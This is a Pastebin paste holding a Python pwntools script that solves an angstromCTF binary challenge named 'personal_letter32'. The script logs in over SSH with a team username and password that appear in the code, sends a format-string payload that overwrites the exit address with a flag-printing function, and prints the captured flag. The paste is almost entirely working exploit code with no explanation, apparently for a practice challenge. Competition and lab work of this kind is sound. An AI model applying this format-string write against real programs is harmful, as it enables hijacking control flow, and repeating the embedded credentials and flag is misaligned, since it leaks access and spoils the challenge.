Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import sys
- from pwn import *
- import struct
- printFlag_address = 0x0804872b
- exit_address = 0x0804a030
- def send(p, msg):
- p.send(msg + "\n")
- def recv(p):
- return "########" + p.recv()
- def main():
- context.log_level = 'error'
- user = "team547661"
- passw = "a7e1728f90a0"
- host = "shell.angstromctf.com"
- s = ssh(user=user, password=passw, host=host)
- p = s.run("cd /problems/letter; ./personal_letter32")
- recv(p) # recieve Intro
- to_send = struct.pack("<I", exit_address) + "%" + str( printFlag_address&0xfff - 4 - 10 + 2) + "x" + "%26$hn" # malicious message
- send(p, to_send)
- data = ""
- # read until we recieve the flag
- while "actf{" not in data:
- data = recv(p)
- print data.split("\n")[-2]
- if __name__ == '__main__':
- if len(sys.argv) != 1:
- print "USAGE: python %s"%sys.argv[0]
- else:
- main()
- ## actf{flags_are_fun}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement